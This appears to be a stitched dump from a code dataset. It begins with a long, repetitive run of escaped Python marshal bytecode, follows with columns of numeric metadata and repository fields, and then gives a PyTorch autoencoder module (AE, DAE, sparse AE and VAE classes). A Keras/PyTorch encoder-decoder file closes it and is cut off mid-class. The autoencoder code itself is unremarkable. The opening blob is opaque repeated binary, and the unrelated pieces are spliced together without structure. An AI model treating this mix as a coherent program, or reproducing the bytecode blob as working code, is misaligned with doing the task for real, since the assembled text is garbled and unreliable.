1(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x0
0\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x
00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x0
0\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00
marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foo
t\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01'))
| 53,500
| 106,985
| 0.748308
| 24,188
| 107,000
| 3.309038
| 0.032578
| 0.356226
| 0.279876
| 0.241082
| 0.904172
| 0.890703
| 0.874736
| 0.864129
| 0.854096
| 0.844138
| 0
| 0.404384
| 0.012112
| 107,000
| 2
| 106,985
| 53,500
| 0.352815
| 0
| 0
| 0
| 0
| 3
| 0.697666
| 0.624789
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 21
|
495286cebf67260e90c5879b2c4f6d369bd9a488
| 6,628
|
py
|
Python
|
margaret/legacy/models/ae.py
|
kpandey008/Margaret
|
402da11c9c9c6730553916cbcd5293c040556a08
|
[
"MIT"
] | 2
|
2021-12-01T15:45:27.000Z
|
2021-12-07T17:17:37.000Z
|
margaret/legacy/models/ae.py
|
kpandey008/Margaret
|
402da11c9c9c6730553916cbcd5293c040556a08
|
[
"MIT"
] | null | null | null |
margaret/legacy/models/ae.py
|
kpandey008/Margaret
|
402da11c9c9c6730553916cbcd5293c040556a08
|
[
"MIT"
] | 2
|
2021-12-16T06:25:51.000Z
|
2022-03-10T23:55:53.000Z
|
import torch
import torch.nn as nn
class AE(nn.Module):
    """Plain fully-connected autoencoder.

    Encoder: infeatures -> 128 -> 64 -> code_size, each stage Linear + BatchNorm + ReLU.
    Decoder mirrors the encoder back up to infeatures.
    """

    def __init__(self, infeatures, code_size=10):
        super(AE, self).__init__()
        self.code_size = code_size
        self.infeatures = infeatures
        self.relu = nn.ReLU()
        # Encoder stack: infeatures -> 128 -> 64 -> code_size
        self.enc_fc1 = nn.Linear(self.infeatures, 128)
        self.enc_bn1 = nn.BatchNorm1d(128)
        self.enc_fc2 = nn.Linear(128, 64)
        self.enc_bn2 = nn.BatchNorm1d(64)
        self.enc_fc3 = nn.Linear(64, self.code_size)
        self.enc_bn3 = nn.BatchNorm1d(self.code_size)
        # Decoder stack: code_size -> 64 -> 128 -> infeatures
        self.dec_fc1 = nn.Linear(self.code_size, 64)
        self.dec_bn1 = nn.BatchNorm1d(64)
        self.dec_fc2 = nn.Linear(64, 128)
        self.dec_bn2 = nn.BatchNorm1d(128)
        self.dec_fc3 = nn.Linear(128, self.infeatures)
        self.dec_bn3 = nn.BatchNorm1d(self.infeatures)

    def encode(self, x):
        """Map a (batch, infeatures) tensor to a (batch, code_size) code."""
        for fc, bn in ((self.enc_fc1, self.enc_bn1),
                       (self.enc_fc2, self.enc_bn2),
                       (self.enc_fc3, self.enc_bn3)):
            x = self.relu(bn(fc(x)))
        return x

    def decode(self, z):
        """Map a (batch, code_size) code back to a (batch, infeatures) tensor."""
        out = z
        for fc, bn in ((self.dec_fc1, self.dec_bn1),
                       (self.dec_fc2, self.dec_bn2),
                       (self.dec_fc3, self.dec_bn3)):
            out = self.relu(bn(fc(out)))
        return out

    def forward(self, x):
        """Encode then decode; returns the reconstruction."""
        return self.decode(self.encode(x))
class DAE(nn.Module):
    """Denoising autoencoder.

    Same architecture as AE, but Gaussian noise (scaled by noise_std) is added
    to the input before encoding in the forward pass.
    """

    def __init__(self, infeatures, code_size=10, noise_std=1.0):
        super(DAE, self).__init__()
        self.code_size = code_size
        self.infeatures = infeatures
        self.relu = nn.ReLU()
        self.noise_std = noise_std
        # Encoder stack: infeatures -> 128 -> 64 -> code_size
        self.enc_fc1 = nn.Linear(self.infeatures, 128)
        self.enc_bn1 = nn.BatchNorm1d(128)
        self.enc_fc2 = nn.Linear(128, 64)
        self.enc_bn2 = nn.BatchNorm1d(64)
        self.enc_fc3 = nn.Linear(64, self.code_size)
        self.enc_bn3 = nn.BatchNorm1d(self.code_size)
        # Decoder stack: code_size -> 64 -> 128 -> infeatures
        self.dec_fc1 = nn.Linear(self.code_size, 64)
        self.dec_bn1 = nn.BatchNorm1d(64)
        self.dec_fc2 = nn.Linear(64, 128)
        self.dec_bn2 = nn.BatchNorm1d(128)
        self.dec_fc3 = nn.Linear(128, self.infeatures)
        self.dec_bn3 = nn.BatchNorm1d(self.infeatures)

    def encode(self, x):
        """Map a (batch, infeatures) tensor to a (batch, code_size) code."""
        for fc, bn in ((self.enc_fc1, self.enc_bn1),
                       (self.enc_fc2, self.enc_bn2),
                       (self.enc_fc3, self.enc_bn3)):
            x = self.relu(bn(fc(x)))
        return x

    def decode(self, z):
        """Map a (batch, code_size) code back to a (batch, infeatures) tensor."""
        out = z
        for fc, bn in ((self.dec_fc1, self.dec_bn1),
                       (self.dec_fc2, self.dec_bn2),
                       (self.dec_fc3, self.dec_bn3)):
            out = self.relu(bn(fc(out)))
        return out

    def forward(self, x):
        """Corrupt the input with Gaussian noise, then encode and decode."""
        corrupted = x + self.noise_std * torch.randn_like(x)
        return self.decode(self.encode(corrupted))
class SparseAE(nn.Module):
    """Sparse autoencoder variant.

    Architecturally identical to DAE (noisy input, same encoder/decoder), but
    forward also returns the latent code so a sparsity penalty can be applied
    to it by the training loop.
    """

    def __init__(self, infeatures, code_size=10, noise_std=1.0):
        super(SparseAE, self).__init__()
        self.code_size = code_size
        self.infeatures = infeatures
        self.relu = nn.ReLU()
        self.noise_std = noise_std
        # Encoder stack: infeatures -> 128 -> 64 -> code_size
        self.enc_fc1 = nn.Linear(self.infeatures, 128)
        self.enc_bn1 = nn.BatchNorm1d(128)
        self.enc_fc2 = nn.Linear(128, 64)
        self.enc_bn2 = nn.BatchNorm1d(64)
        self.enc_fc3 = nn.Linear(64, self.code_size)
        self.enc_bn3 = nn.BatchNorm1d(self.code_size)
        # Decoder stack: code_size -> 64 -> 128 -> infeatures
        self.dec_fc1 = nn.Linear(self.code_size, 64)
        self.dec_bn1 = nn.BatchNorm1d(64)
        self.dec_fc2 = nn.Linear(64, 128)
        self.dec_bn2 = nn.BatchNorm1d(128)
        self.dec_fc3 = nn.Linear(128, self.infeatures)
        self.dec_bn3 = nn.BatchNorm1d(self.infeatures)

    def encode(self, x):
        """Map a (batch, infeatures) tensor to a (batch, code_size) code."""
        for fc, bn in ((self.enc_fc1, self.enc_bn1),
                       (self.enc_fc2, self.enc_bn2),
                       (self.enc_fc3, self.enc_bn3)):
            x = self.relu(bn(fc(x)))
        return x

    def decode(self, z):
        """Map a (batch, code_size) code back to a (batch, infeatures) tensor."""
        out = z
        for fc, bn in ((self.dec_fc1, self.dec_bn1),
                       (self.dec_fc2, self.dec_bn2),
                       (self.dec_fc3, self.dec_bn3)):
            out = self.relu(bn(fc(out)))
        return out

    def forward(self, x):
        """Corrupt, encode, decode; returns (code, reconstruction)."""
        noisy = x + self.noise_std * torch.randn_like(x)
        z = self.encode(noisy)
        return z, self.decode(z)
class VAE(nn.Module):
    """Variational autoencoder.

    The encoder produces a mean and log-variance head; a latent sample is
    drawn via the reparameterization trick and decoded. The decoder output is
    a raw linear layer (no activation).
    """

    def __init__(self, infeatures, code_size=10):
        super(VAE, self).__init__()
        self.code_size = code_size
        self.infeatures = infeatures
        self.relu = nn.ReLU()
        # Shared encoder trunk: infeatures -> 128 -> 64
        self.enc_fc1 = nn.Linear(self.infeatures, 128)
        self.enc_bn1 = nn.BatchNorm1d(128)
        self.enc_fc2 = nn.Linear(128, 64)
        self.enc_bn2 = nn.BatchNorm1d(64)
        # Two heads: fc31 -> mu, fc32 -> logvar
        self.enc_fc31 = nn.Linear(64, self.code_size)
        self.enc_fc32 = nn.Linear(64, self.code_size)
        self.dropout = nn.Dropout(0.1)
        # Decoder: code_size -> 64 -> 128 -> infeatures (last layer linear)
        self.dec_fc1 = nn.Linear(self.code_size, 64)
        self.dec_bn1 = nn.BatchNorm1d(64)
        self.dec_fc2 = nn.Linear(64, 128)
        self.dec_bn2 = nn.BatchNorm1d(128)
        self.dec_fc3 = nn.Linear(128, self.infeatures)

    def encode(self, x):
        """Return (mu, logvar), each of shape (batch, code_size)."""
        h = self.relu(self.enc_bn1(self.enc_fc1(x)))
        h = self.dropout(self.relu(self.enc_bn2(self.enc_fc2(h))))
        return self.enc_fc31(h), self.enc_fc32(h)

    def decode(self, z):
        """Decode a latent sample; output is unbounded (no final activation)."""
        h = self.relu(self.dec_bn1(self.dec_fc1(z)))
        h = self.relu(self.dec_bn2(self.dec_fc2(h)))
        return self.dec_fc3(h)

    def reparameterize(self, mu, logvar):
        """Sample z = mu + eps * std with eps ~ N(0, 1) (reparameterization trick)."""
        std = (0.5 * logvar).exp()
        return mu + torch.randn_like(std) * std

    def forward(self, x):
        """Return (z, reconstruction, mu, logvar)."""
        mu, logvar = self.encode(x)
        z = self.reparameterize(mu, logvar)
        return z, self.decode(z), mu, logvar
if __name__ == "__main__":
    # Smoke test: each model should map a (32, 100) batch back to (32, 100).
    ae = AE(infeatures=100)
    dae = DAE(infeatures=100)
    vae = VAE(infeatures=100)
    # Renamed from `input`, which shadowed the builtin of the same name.
    batch = torch.randn((32, 100))
    print(ae(batch).shape)
    print(dae(batch).shape)
    print(vae(batch)[1].shape)
| 31.712919
| 64
| 0.607725
| 962
| 6,628
| 4.009356
| 0.082121
| 0.087114
| 0.068447
| 0.064039
| 0.875292
| 0.842624
| 0.842624
| 0.82266
| 0.815141
| 0.79077
| 0
| 0.056312
| 0.268558
| 6,628
| 208
| 65
| 31.865385
| 0.739274
| 0.072571
| 0
| 0.77551
| 0
| 0
| 0.001307
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.115646
| false
| 0
| 0.013605
| 0
| 0.244898
| 0.020408
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b8e1a79399985d5471b8dd5edc0e6fffd7ed855f
| 11,497
|
py
|
Python
|
models/encoders_decoders.py
|
BobakBaghi/McGillPhysHackathon2020
|
c4c6c2d4c3b89d2750e1184059d9cb446cbd03d7
|
[
"MIT"
] | 1
|
2020-11-08T17:29:01.000Z
|
2020-11-08T17:29:01.000Z
|
models/encoders_decoders.py
|
BobakBaghi/McGillPhysHackathon2020
|
c4c6c2d4c3b89d2750e1184059d9cb446cbd03d7
|
[
"MIT"
] | null | null | null |
models/encoders_decoders.py
|
BobakBaghi/McGillPhysHackathon2020
|
c4c6c2d4c3b89d2750e1184059d9cb446cbd03d7
|
[
"MIT"
] | null | null | null |
from keras.models import Model
from keras.layers import Input, Conv2D, Activation, BatchNormalization, Flatten, Dense, Conv2DTranspose, Reshape
from utils import get_channels_axis
import torch
import torch.nn as nn
def conv_encoder(input_side=32, n_channels=3, representation_dim=256, representation_activation='tanh',
                 intermediate_activation='relu'):
    """Build a Keras convolutional encoder mapping an image to a dense representation.

    Three (or four, when input_side == 64) stride-2 conv stages halve the
    spatial size down to 4x4, then a Dense layer produces the representation.
    """
    nf = 64

    def down_block(t, filters):
        # Stride-2 conv (halves spatial size) -> batch norm -> activation.
        t = Conv2D(filters, kernel_size=(3, 3), strides=(2, 2), padding='same')(t)
        t = BatchNormalization(axis=get_channels_axis())(t)
        return Activation(intermediate_activation)(t)

    if get_channels_axis() == 1:
        input_shape = (n_channels, input_side, input_side)
    else:
        input_shape = (input_side, input_side, n_channels)
    x_in = Input(shape=input_shape)
    enc = down_block(x_in, nf)
    enc = down_block(enc, nf * 2)
    enc = down_block(enc, nf * 4)
    if input_side == 64:
        # One extra downsampling stage so the spatial size still ends at 4x4.
        enc = down_block(enc, nf * 8)
    rep = Dense(representation_dim, activation=representation_activation)(Flatten()(enc))
    return Model(x_in, rep)
def conv_decoder(output_side=32, n_channels=3, representation_dim=256, activation='relu'):
    """Build a Keras convolutional decoder mapping a representation back to an image.

    A Dense layer reshaped to 4x4 feature maps is upsampled by stride-2
    transposed convs; the final layer emits n_channels with tanh.
    """
    nf = 64

    def up_block(t, filters):
        # Stride-2 transposed conv (doubles spatial size) -> batch norm -> activation.
        t = Conv2DTranspose(filters, kernel_size=(3, 3), strides=(2, 2), padding='same')(t)
        t = BatchNormalization(axis=get_channels_axis())(t)
        return Activation(activation)(t)

    rep_in = Input(shape=(representation_dim,))
    g = Dense(nf * 4 * 4 * 4)(rep_in)
    g = BatchNormalization(axis=-1)(g)
    g = Activation(activation)(g)
    if get_channels_axis() == 1:
        conv_shape = (nf * 4, 4, 4)
    else:
        conv_shape = (4, 4, nf * 4)
    g = Reshape(conv_shape)(g)
    g = up_block(g, nf * 2)
    g = up_block(g, nf)
    if output_side == 64:
        # One extra upsampling stage to reach 64x64 output.
        g = up_block(g, nf)
    g = Conv2DTranspose(n_channels, kernel_size=(3, 3), strides=(2, 2), padding='same')(g)
    g = Activation('tanh')(g)
    return Model(rep_in, g)
class CAE_pytorch(nn.Module):
    """Convolutional autoencoder (PyTorch).

    Encoder: three stride-2 convs (32x32 input -> 4x4), then a Linear + Tanh
    produces a rep_dim representation. Decoder mirrors it with transposed
    convs and a final Tanh output.
    """

    def __init__(self, in_channels=3, rep_dim=256):
        super(CAE_pytorch, self).__init__()
        nf = 64
        self.nf = nf
        # Encoder: each stage halves the spatial size.
        self.enc_conv1 = nn.Conv2d(in_channels=in_channels, out_channels=nf, kernel_size=3, stride=2, padding=1)
        self.enc_bn1 = nn.BatchNorm2d(num_features=nf)
        self.enc_act1 = nn.ReLU(inplace=True)
        self.enc_conv2 = nn.Conv2d(in_channels=nf, out_channels=nf * 2, kernel_size=3, stride=2, padding=1)
        self.enc_bn2 = nn.BatchNorm2d(num_features=nf * 2)
        self.enc_act2 = nn.ReLU(inplace=True)
        self.enc_conv3 = nn.Conv2d(in_channels=nf * 2, out_channels=nf * 4, kernel_size=3, stride=2, padding=1)
        self.enc_bn3 = nn.BatchNorm2d(num_features=nf * 4)
        self.enc_act3 = nn.ReLU(inplace=True)
        # Flattened 4x4 feature maps -> representation, squashed by tanh.
        self.enc_fc = nn.Linear(nf * 4 * 4 * 4, rep_dim)
        self.rep_act = nn.Tanh()
        # Decoder: mirror of the encoder using transposed convolutions.
        self.dec_fc = nn.Linear(rep_dim, nf * 4 * 4 * 4)
        self.dec_bn0 = nn.BatchNorm1d(num_features=nf * 4 * 4 * 4)
        self.dec_act0 = nn.ReLU(inplace=True)
        self.dec_conv1 = nn.ConvTranspose2d(in_channels=nf * 4, out_channels=nf * 2, kernel_size=3, stride=2, padding=1, output_padding=1)
        self.dec_bn1 = nn.BatchNorm2d(num_features=nf * 2)
        self.dec_act1 = nn.ReLU(inplace=True)
        self.dec_conv2 = nn.ConvTranspose2d(in_channels=nf * 2, out_channels=nf, kernel_size=3, stride=2, padding=1, output_padding=1)
